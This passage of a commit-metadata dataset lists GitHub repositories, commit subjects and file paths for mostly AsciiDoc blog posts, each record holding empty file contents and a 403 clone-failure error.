asticsearch_v2.1.0-baishuo,pritishppai\/elasticsearch,himanshuag\/elasticsearch,nilabhsagar\/elasticsearch,mgalushka\/elasticsearch,njlawton\/elasticsearch,alexshadow007\/elasticsearch,liweinan0423\/elasticsearch,jprante\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,lmtwga\/elasticsearch,ckclark\/elasticsearch,franklanganke\/elasticsearch,martinstuga\/elasticsearch,pranavraman\/elasticsearch,tkssharma\/elasticsearch,henakamaMSFT\/elasticsearch,mcku\/elasticsearch,jimczi\/elasticsearch,yongminxia\/elasticsearch,MichaelLiZhou\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,ouyangkongtong\/elasticsearch,njlawton\/elasticsearch,YosuaMichael\/elasticsearch,strapdata\/elassandra,mapr\/elasticsearch,wittyameta\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,weipinghe\/elasticsearch,hafkensite\/elasticsearch,pritishppai\/elasticsearch,mjason3\/elasticsearch,nrkkalyan\/elasticsearch,masterweb121\/elasticsearch,JSCooke\/elasticsearch,jbertouch\/elasticsearch,springning\/elasticsearch,wittyameta\/elasticsearch,F0lha\/elasticsearch,umeshdangat\/elasticsearch,AndreKR\/elasticsearch,jeteve\/elasticsearch,petabytedata\/elasticsearch,mnylen\/elasticsearch,Uiho\/elasticsearch,a2lin\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,artnowo\/elasticsearch,bestwpw\/elasticsearch,mcku\/elasticsearch,naveenhooda2000\/elasticsearch,awislowski\/elasticsearch,adrianbk\/elasticsearch,wangtuo\/elasticsearch,fernandozhu\/elasticsearch,tkssharma\/elasticsearch,mm0\/elasticsearch,Collaborne\/elasticsearch,lzo\/elasticsearch-1,liweinan0423\/elasticsearch,davidvgalbraith\/elasticsearch,huanzhong\/elasticsearch,ImpressTV\/elasticsearch,pozhidaevak\/elasticsearch,ivansun1010\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,pritishppai\/elasticsearch,Brijeshrpatel9\/elasticsearch,tahaemin\/elasticsearch,fforbeck\/elasticsearch,iacdingping\/elasticsearch,markharwood\/elasticsearch,markharwood\/elasticsearch,weipinghe\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,bawse\/elasticsearch,umeshdangat\/elasticsearch,elancom\/elasticsearch,Siddartha07\/elasticsearch,camilojd\/elasticsearch,girirajsharma\/elasticsearch,masaruh\/elasticsearch,mm0\/elasticsearch,jeteve\/elasticsearch,masaruh\/elasticsearch,kingaj\/elasticsearch,btiernay\/elasticsearch,mmaracic\/elasticsearch,truemped\/elasticsearch,awislowski\/elasticsearch,jpountz\/elasticsearch,njlawton\/elasticsearch,sdauletau\/elasticsearch,elancom\/elasticsearch,avikurapati\/elasticsearch,jango2015\/elasticsearch,wangtuo\/elasticsearch,sposam\/elasticsearch,gmarz\/elasticsearch,btiernay\/elasticsearch,nomoa\/elasticsearch,achow\/elasticsearch,elancom\/elasticsearch,nezirus\/elasticsearch,weipinghe\/elasticsearch,rajanm\/elasticsearch,martinstuga\/elasticsearch,pranavraman\/elasticsearch,ESamir\/elasticsearch,wimvds\/elasticsearch,mcku\/elasticsearch,diendt\/elasticsearch,kaneshin\/elasticsearch,snikch\/elasticsearch,GlenRSmith\/elasticsearch,socialrank\/elasticsearch,kalimatas\/elasticsearch,drewr\/elasticsearch,artnowo\/elasticsearch,cnfire\/elasticsearch-1,naveenhooda2000\/elasticsearch,xingguang2013\/elasticsearch,btiernay\/elasticsearch,LewayneNaidoo\/elasticsearch,AndreKR\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,vroyer\/elasticassandra,masterweb121\/elasticsearch,kalburgimanjunath\/elasticsearch,glefloch\/elasticsearch,mohit\/elasticsearch,lzo\/elasticsearch-1,ESamir\/elasticsearch,beiske\/elasticsearch,AndreKR\/elasticsearch,mjason3\/elasticsearch,himanshuag\/elastic
search,YosuaMichael\/elasticsearch,dongjoon-hyun\/elasticsearch,wbowling\/elasticsearch,spiegela\/elasticsearch,vietlq\/elasticsearch,brandonkearby\/elasticsearch,achow\/elasticsearch,geidies\/elasticsearch,jango2015\/elasticsearch,djschny\/elasticsearch,jbertouch\/elasticsearch,iacdingping\/elasticsearch,ckclark\/elasticsearch,JackyMai\/elasticsearch,zhiqinghuang\/elasticsearch,MjAbuz\/elasticsearch,Brijeshrpatel9\/elasticsearch,nezirus\/elasticsearch,18098924759\/elasticsearch,strapdata\/elassandra,franklanganke\/elasticsearch,tahaemin\/elasticsearch,yynil\/elasticsearch,lydonchandra\/elasticsearch,infusionsoft\/elasticsearch,obourgain\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,sdauletau\/elasticsearch,markwalkom\/elasticsearch,clintongormley\/elasticsearch,mortonsykes\/elasticsearch,Uiho\/elasticsearch,mnylen\/elasticsearch,queirozfcom\/elasticsearch,StefanGor\/elasticsearch,geidies\/elasticsearch,andrejserafim\/elasticsearch,ESamir\/elasticsearch,rajanm\/elasticsearch,18098924759\/elasticsearch,springning\/elasticsearch,fforbeck\/elasticsearch,andrestc\/elasticsearch,MjAbuz\/elasticsearch,adrianbk\/elasticsearch,caengcjd\/elasticsearch,MaineC\/elasticsearch,kalburgimanjunath\/elasticsearch,pablocastro\/elasticsearch,henakamaMSFT\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,jeteve\/elasticsearch,artnowo\/elasticsearch,awislowski\/elasticsearch,nazarewk\/elasticsearch,strapdata\/elassandra,YosuaMichael\/elasticsearch,adrianbk\/elasticsearch,sdauletau\/elasticsearch,mm0\/elasticsearch,LeoYao\/elasticsearch,cwurm\/elasticsearch,truemped\/elasticsearch,beiske\/elasticsearch,rhoml\/elasticsearch,djschny\/elasticsearch,elasticdog\/elasticsearch,hafkensite\/elasticsearch,lmtwga\/elasticsearch,18098924759\/elasticsearch,pranavraman\/elasticsearch,beiske\/elasticsearch,YosuaMichael\/elasticsearch,awislowski\/elasticsearch,knight1128\/elasticsearch,kalburgimanjunath\/elasticsearch,infusionsoft\/elasticsearch,caengcjd\/elasticsearch,18098924759\/elasticsearch,Charlesdong\/elasticsearch,ricardocerq\/elasticsearch,F0lha\/elasticsearch,btiernay\/elasticsearch,yanjunh\/elasticsearch,LeoYao\/elasticsearch,xingguang2013\/elasticsearch,lydonchandra\/elasticsearch,cwurm\/elasticsearch,ckclark\/elasticsearch,trangvh\/elasticsearch,JervyShi\/elasticsearch,yanjunh\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,hydro2k\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,iamjakob\/elasticsearch,yynil\/elasticsearch,mjason3\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra5-rc,girirajsharma\/elasticsearch,mohit\/elasticsearch,kingaj\/elasticsearch,polyfractal\/elasticsearch,lzo\/elasticsearch-1,MisterAndersen\/elasticsearch,sc0ttkclark\/elasticsearch,xuzha\/elasticsearch,snikch\/elasticsearch,jango2015\/elasticsearch,i-am-Nathan\/elasticsearch,ZTE-PaaS\/elasticsearch,xingguang2013\/elasticsearch,slavau\/elasticsearch,strapdata\/elassandra-test,jbertouch\/elasticsearch,infusionsoft\/elasticsearch,Rygbee\/elasticsearch,ulkas\/elasticsearch,sposam\/elasticsearch,winstonewert\/elasticsearch,snikch\/elasticsearch,GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wbowling\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,lzo\/elasticsearch-1,MisterAndersen\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,mgalushka\/elasticsearch,areek\/elasticsearch,sc0ttkclark\/elasticsearch,ricardocerq\/elasticsearch,kalburgimanjunath\/elasticsearch,diendt\/elasticsearch,s1monw\/elasti
csearch,cnfire\/elasticsearch-1,wbowling\/elasticsearch,tahaemin\/elasticsearch,mmaracic\/elasticsearch,tkssharma\/elasticsearch,vroyer\/elasticassandra,hydro2k\/elasticsearch,lks21c\/elasticsearch,dongjoon-hyun\/elasticsearch,rhoml\/elasticsearch,Collaborne\/elasticsearch,apepper\/elasticsearch,ouyangkongtong\/elasticsearch,strapdata\/elassandra-test,wenpos\/elasticsearch,polyfractal\/elasticsearch,ckclark\/elasticsearch,adrianbk\/elasticsearch,rajanm\/elasticsearch,iacdingping\/elasticsearch,kalimatas\/elasticsearch,PhaedrusTheGreek\/elasticsearch,mortonsykes\/elasticsearch,polyfractal\/elasticsearch,ZTE-PaaS\/elasticsearch,mikemccand\/elasticsearch,zkidkid\/elasticsearch,18098924759\/elasticsearch,KimTaehee\/elasticsearch,huanzhong\/elasticsearch,areek\/elasticsearch,yynil\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,ImpressTV\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,pranavraman\/elasticsearch,HonzaKral\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,bestwpw\/elasticsearch,gfyoung\/elasticsearch,ckclark\/elasticsearch,mnylen\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,andrejserafim\/elasticsearch,hafkensite\/elasticsearch,PhaedrusTheGreek\/elasticsearch,queirozfcom\/elasticsearch,StefanGor\/elasticsearch,lmtwga\/elasticsearch,mikemccand\/elasticsearch,Charlesdong\/elasticsearch,glefloch\/elasticsearch,Brijeshrpatel9\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,huanzhong\/elasticsearch,iamjakob\/elasticsearch,clintongormley\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,elancom\/elasticsearch,wuranbo\/elasticsearch,ImpressTV\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,iacdingping\/elasticsearch,queirozfcom\/elasticsearch,weipinghe\/elasticsearch,kaneshin\/elasticsearch,mm0\/elasticsearch,schonfeld\/elasticsearch,Charlesdong\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra5-rc,sc0ttkclark\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,bestwpw\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,nrkkalyan\/elasticsearch,Siddartha07\/elasticsearch,vietlq\/elasticsearch,cnfire\/elasticsearch-1,bawse\/elasticsearch,djschny\/elasticsearch,sc0ttkclark\/elasticsearch,andrestc\/elasticsearch,jchampion\/elasticsearch,nknize\/elasticsearch,ricardocerq\/elasticsearch,camilojd\/elasticsearch,slavau\/elasticsearch,cnfire\/elasticsearch-1,kingaj\/elasticsearch,LeoYao\/elasticsearch,sdauletau\/elasticsearch,areek\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MetSystem\/elasticsearch,apepper\/elasticsearch,gmarz\/elasticsearch,MetSystem\/elasticsearch,strapdata\/elassandra5-rc,Ansh90\/elasticsearch,mapr\/elasticsearch,jprante\/elasticsearch,andrejserafim\/elasticsearch,Ansh90\/elasticsearch,socialrank\/elasticsearch,jeteve\/elasticsearch,rajanm\/elasticsearch,MjAbuz\/elasticsearch,obourgain\/elasticsearch,rmuir\/elasticsearch,i-am-Nathan\/elasticsearch,onegambler\/elasticsearch,kaneshin\/elasticsearch,Collaborne\/elasticsearch,girirajsharma\/elasticsearch,markharwood\/elasticsearch,kunallimaye\/elasticsearch,mohit\/elasticsearch,sdauletau\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,F0lha\/elasticsearch,onegambler\/elasticsearch,coding0011\/elasticsearch,knight1128\/elasticsearch,wuranbo\/elasticsearch,iacdingping\/elasticsearch,pablocastro\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,tahaemin\/ela
sticsearch,dpursehouse\/elasticsearch,KimTaehee\/elasticsearch,GlenRSmith\/elasticsearch,liweinan0423\/elasticsearch,lks21c\/elasticsearch,PhaedrusTheGreek\/elasticsearch,sneivandt\/elasticsearch,dpursehouse\/elasticsearch,JervyShi\/elasticsearch,Collaborne\/elasticsearch,avikurapati\/elasticsearch,YosuaMichael\/elasticsearch,lmtwga\/elasticsearch,nellicus\/elasticsearch,njlawton\/elasticsearch,vroyer\/elasticassandra,pablocastro\/elasticsearch,IanvsPoplicola\/elasticsearch,achow\/elasticsearch,ESamir\/elasticsearch,yongminxia\/elasticsearch,areek\/elasticsearch,jango2015\/elasticsearch,winstonewert\/elasticsearch,hydro2k\/elasticsearch,s1monw\/elasticsearch,wittyameta\/elasticsearch,C-Bish\/elasticsearch,lzo\/elasticsearch-1,fforbeck\/elasticsearch,petabytedata\/elasticsearch,sneivandt\/elasticsearch,rhoml\/elasticsearch,s1monw\/elasticsearch,kunallimaye\/elasticsearch,kaneshin\/elasticsearch,xingguang2013\/elasticsearch,ulkas\/elasticsearch,achow\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,clintongormley\/elasticsearch,hafkensite\/elasticsearch,wuranbo\/elasticsearch,yongminxia\/elasticsearch,karthikjaps\/elasticsearch,artnowo\/elasticsearch,AndreKR\/elasticsearch,jprante\/elasticsearch,camilojd\/elasticsearch,obourgain\/elasticsearch,rhoml\/elasticsearch,glefloch\/elasticsearch,mbrukman\/elasticsearch,Siddartha07\/elasticsearch,mm0\/elasticsearch,onegambler\/elasticsearch,gmarz\/elasticsearch,beiske\/elasticsearch,vietlq\/elasticsearch,knight1128\/elasticsearch,drewr\/elasticsearch,karthikjaps\/elasticsearch,18098924759\/elasticsearch,nilabhsagar\/elasticsearch,masterweb121\/elasticsearch,Uiho\/elasticsearch,girirajsharma\/elasticsearch,vietlq\/elasticsearch,ulkas\/elasticsearch,achow\/elasticsearch,bawse\/elasticsearch,truemped\/elasticsearch,MaineC\/elasticsearch,caengcjd\/elasticsearch,xingguang2013\/elasticsearch,masaruh\/elasticsearch,bestwpw\/elasticsearch,masterweb121\/elasticsearch,nezirus\/elasticsearch,franklanganke\/elasticsearch,rento19962\/elasticsearch,himanshuag\/elasticsearch,ouyangkongtong\/elasticsearch,shreejay\/elasticsearch,btiernay\/elasticsearch,jpountz\/elasticsearch,episerver\/elasticsearch,sreeramjayan\/elasticsearch,himanshuag\/elasticsearch,elasticdog\/elasticsearch,PhaedrusTheGreek\/elasticsearch,IanvsPoplicola\/elasticsearch,YosuaMichael\/elasticsearch,sc0ttkclark\/elasticsearch,Helen-Zhao\/elasticsearch,djschny\/elasticsearch,AndreKR\/elasticsearch,wittyameta\/elasticsearch,wimvds\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lzo\/elasticsearch-1,pozhidaevak\/elasticsearch,slavau\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,naveenhooda2000\/elasticsearch,beiske\/elasticsearch,slavau\/elasticsearch,jimczi\/elasticsearch,tkssharma\/elasticsearch,nellicus\/elasticsearch,LeoYao\/elasticsearch,kaneshin\/elasticsearch,rento19962\/elasticsearch,tebriel\/elasticsearch,Charlesdong\/elasticsearch,sreeramjayan\/elasticsearch,jpountz\/elasticsearch,girirajsharma\/elasticsearch,davidvgalbraith\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,diendt\/elasticsearch,nrkkalyan\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,sposam\/elasticsearch,kalburgimanjunath\/elasticsearch,vietlq\/elasticsearch,djschny\/elasticsearch,brandonkearby\/elasticsearch,bestwpw\/elasticsearch,spiegela\/elasticsearch,onegambler\/elasticsearch,infusionsoft\/elasticsearch,sreeramjayan\/elasticsearch,Uiho\/elasticsearch,nrkkalyan\/elasticsearch,jango2015\/elasticsearch,ivansun1010\/elasticsearch,episerver\/elasticsearch,ulkas\
/elasticsearch,mcku\/elasticsearch,ckclark\/elasticsearch,jango2015\/elasticsearch,masterweb121\/elasticsearch,pritishppai\/elasticsearch,lzo\/elasticsearch-1,masterweb121\/elasticsearch,rento19962\/elasticsearch,slavau\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,njlawton\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrestc\/elasticsearch,ImpressTV\/elasticsearch,mbrukman\/elasticsearch,mmaracic\/elasticsearch,rmuir\/elasticsearch,strapdata\/elassandra-test,Brijeshrpatel9\/elasticsearch,markwalkom\/elasticsearch,franklanganke\/elasticsearch,weipinghe\/elasticsearch,camilojd\/elasticsearch,adrianbk\/elasticsearch,jchampion\/elasticsearch,Uiho\/elasticsearch,ricardocerq\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,nellicus\/elasticsearch,palecur\/elasticsearch,schonfeld\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,MichaelLiZhou\/elasticsearch,F0lha\/elasticsearch,mmaracic\/elasticsearch,elasticdog\/elasticsearch,socialrank\/elasticsearch,yynil\/elasticsearch,huanzhong\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,vroyer\/elassandra,ZTE-PaaS\/elasticsearch,djschny\/elasticsearch,davidvgalbraith\/elasticsearch,nrkkalyan\/elasticsearch,markharwood\/elasticsearch,queirozfcom\/elasticsearch,sdauletau\/elasticsearch,JSCooke\/elasticsearch","old_file":"docs\/reference\/modules\/cluster\/disk_allocator.asciidoc","new_file":"docs\/reference\/modules\/cluster\/disk_allocator.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7b19087d1833b0980ca2917d70b815bce5ba5df","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d52d63063decb24d0683fdff90f0dca2bcd22f7","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3f1bf55b1e7cd7b00b9c2526753fd7f6095c185","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 
2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c65473213e0848341caf07ee9c721b4f017a69e","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9165d6a0c1ae11761b4978a8495fe3c7441cbef8","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b688ab34e8724e1424b4a16fe3bbd19ec37d25e3","subject":"y2b create post iPad 3 Review \\\/ Rant (New iPad Review \\\/ 3rd Gen \\\/ 2012)","message":"y2b create post iPad 3 Review \\\/ Rant (New iPad Review \\\/ 3rd Gen \\\/ 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-17-iPad-3-Review--Rant-New-iPad-Review--3rd-Gen--2012.adoc","new_file":"_posts\/2012-03-17-iPad-3-Review--Rant-New-iPad-Review--3rd-Gen--2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57b12c641aed12cd82bf2505864949dccd08f399","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63ef71ed0babb7b7a6d06881950fee42c190a3b0","subject":"Update 2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","message":"Update 
2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","new_file":"_posts\/2015-10-15-Seeking-the-best-wireframing-tool-for-mobile-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5db2142af3d70c85f90f438542bd207e4b3d98b6","subject":"Update 2016-04-30-hibernate-native-json.adoc","message":"Update 2016-04-30-hibernate-native-json.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-04-30-hibernate-native-json.adoc","new_file":"_posts\/2016-04-30-hibernate-native-json.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68790f4e05e39d7322652b94e0371acf0cc443e3","subject":"Update 2018-02-05-Think-About-Documents.adoc","message":"Update 2018-02-05-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7567f84c986ec1b0e03d5ff8664fc958ecccd8e6","subject":"Update 2016-11-10-091800-Thursday-Morning.adoc","message":"Update 2016-11-10-091800-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d0461ef3db8612947171112b90645ca7d87d6a4","subject":"Update 2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","message":"Update 2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","new_file":"_posts\/2016-06-23-Frozen-Ever-After-opens-in-Epcot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6baf98931080d9ebba3ddad45a8d2071c27afd98","subject":"Design documentation on resilience","message":"Design documentation on 
resilience\n","repos":"cschanck\/ehcache3,rkavanap\/ehcache3,AbfrmBlr\/ehcache3,GaryWKeim\/ehcache3,henri-tremblay\/ehcache3,AbfrmBlr\/ehcache3,jhouserizer\/ehcache3,ehcache\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,aurbroszniowski\/ehcache3,chrisdennis\/ehcache3,lorban\/ehcache3,lorban\/ehcache3,jhouserizer\/ehcache3,ljacomet\/ehcache3,alexsnaps\/ehcache3,ehcache\/ehcache3,ljacomet\/ehcache3,albinsuresh\/ehcache3,albinsuresh\/ehcache3,rkavanap\/ehcache3,chrisdennis\/ehcache3,GaryWKeim\/ehcache3,cschanck\/ehcache3,cljohnso\/ehcache3","old_file":"docs\/src\/docs\/asciidoc\/developer\/design.resilience.adoc","new_file":"docs\/src\/docs\/asciidoc\/developer\/design.resilience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhouserizer\/ehcache3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e31ee77351fb43499537732185a40b160faa6f9","subject":"y2b create post It Has Double The Battery of iPhone X","message":"y2b create post It Has Double The Battery of iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-28-It%20Has%20Double%20The%20Battery%20of%20iPhone%20X.adoc","new_file":"_posts\/2018-01-28-It%20Has%20Double%20The%20Battery%20of%20iPhone%20X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2199e0bde87446e3db588018e0a970843b208cb","subject":"y2b create post Top 5 Tech Under $200","message":"y2b create post Top 5 Tech Under $200","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-28-Top-5-Tech-Under-200.adoc","new_file":"_posts\/2014-11-28-Top-5-Tech-Under-200.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2f4356485d9329124f808e3ef96aef9bb25a33f","subject":"One class only","message":"One class only\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/421.adoc","new_file":"Objects & interfaces\/421.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b58bd6b54877d5206c01167c93e683112b7785a","subject":"Update 2015-02-09-Test.adoc","message":"Update 2015-02-09-Test.adoc","repos":"HiDAl\/hidal.github.io,HiDAl\/hidal.github.io,HiDAl\/hidal.github.io,HiDAl\/hidal.github.io","old_file":"_posts\/2015-02-09-Test.adoc","new_file":"_posts\/2015-02-09-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HiDAl\/hidal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87c742980d15a33ddde20a936a0e170f06e0b02f","subject":"Update 2015-07-02-Perl.adoc","message":"Update 
